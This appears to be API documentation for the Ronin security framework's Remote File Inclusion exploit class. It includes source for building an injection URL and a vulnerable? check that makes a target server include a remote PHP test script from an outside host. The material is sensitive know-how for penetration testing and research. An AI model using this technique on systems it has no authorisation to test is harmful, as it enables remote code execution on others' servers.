Class: Ronin::Exploits::RFI

Inherits:
Web show all
Defined in:
lib/ronin/exploits/rfi.rb

Overview

Represents Remote File Inclusion (RFI) exploits.

Since:

  • 1.0.0

Constant Summary collapse

TEST_SCRIPTS =

Default URL of the RFI Test script

Since:

  • 1.0.0

{
  PHP: 'http://ronin-ruby.github.com/static/ronin/php/rfi/test.php'
}
EXTS =

The script extensions and their languages

Since:

  • 1.0.0

{
  '.asp'  => :ASP,
  '.aspx' => :ASP,
  '.cfm'  => :ColdFusion,
  '.cfml' => :ColdFusion,
  '.jsp'  => :JSP,
  '.php'  => :PHP,
  '.pl'   => :Perl,
  ''      => :unknown
}

Constants inherited from HTTP

HTTP::DEFAULT_PORT

Instance Attribute Summary

Attributes inherited from Exploit

#encoders, #helpers, #raw_payload, #restricted_chars, #target

Attributes included from Payloads::HasPayload

#payload

Instance Method Summary collapse

Methods inherited from Web

#exploit, #http_request, #normal_body, #normal_response, test, #url, #url_query_param_value

Methods inherited from HTTP

#url_for

Methods inherited from RemoteTCP

#deploy!, #test!

Methods included from Model::HasDefaultPort

included

Methods inherited from Exploit

#advisory, advisory, #arch, #build!, #build_payload!, #deploy!, #encode_payload, #encode_payload!, #evacuate!, #exploit!, #helper, #initialize, #os, #payload=, #restrict, #software, #targeting, #targeting_arch, targeting_arch, #targeting_os, targeting_os, #targeting_software, targeting_software, #use_target!

Methods included from Tests

#is_restricted?, #test_arch!, #test_os!, #test_restricted!, #test_software!, #test_target!

Methods included from PostExploitation::Mixin

#fs, #post_exploitation, #process, #resources, #shell

Methods included from Payloads::HasPayload

#default_payload, #initialize, #method_missing, #payload_class, #respond_to?, #use_payload!, #use_payload_from!

Constructor Details

This class inherits a constructor from Ronin::Exploits::Exploit

Dynamic Method Handling

This class handles dynamic methods through the method_missing method in the class Ronin::Payloads::HasPayload

Instance Method Details

#exploit_url(remote_url, query_params = {}) ⇒ URI::HTTP

Creates an exploit URL which includes the remote URL.

Since:

  • 1.0.0


89
90
91
92
93
94
95
# File 'lib/ronin/exploits/rfi.rb', line 89

def exploit_url(remote_url,query_params={})
  if terminate?
    remote_url = "#{remote_url}?"
  end

  return super(remote_url,query_params)
end

#script_languageSymbol

The Scripting Language the URL is using.

Since:

  • 1.0.0


63
64
65
# File 'lib/ronin/exploits/rfi.rb', line 63

def script_language
  EXTS[File.extname(self.url_path)]
end

#test_scriptString?

The remote script to test the URL for Remote File Inclusion (RFI).

Since:

  • 1.0.0


73
74
75
# File 'lib/ronin/exploits/rfi.rb', line 73

def test_script
  TEST_SCRIPTS[script_language]
end

#vulnerable?Boolean

Determines if the URL is vulnerable to RFI.

Since:

  • 1.0.0


103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# File 'lib/ronin/exploits/rfi.rb', line 103

def vulnerable?
  unless script_language
    raise(NotImplementedError,"cannot test against #{script_language}")
  end

  unless (remote_url = test_script)
    raise(NotImplementedError,"no test script for #{script_language}")
  end

  challenge = Chars::ALPHA.random_string(10)
  expected  = Digest::MD5.hexdigest(challenge)
  body      = exploit(remote_url, 'test' => challenge).body

  return body.include?(expected)
end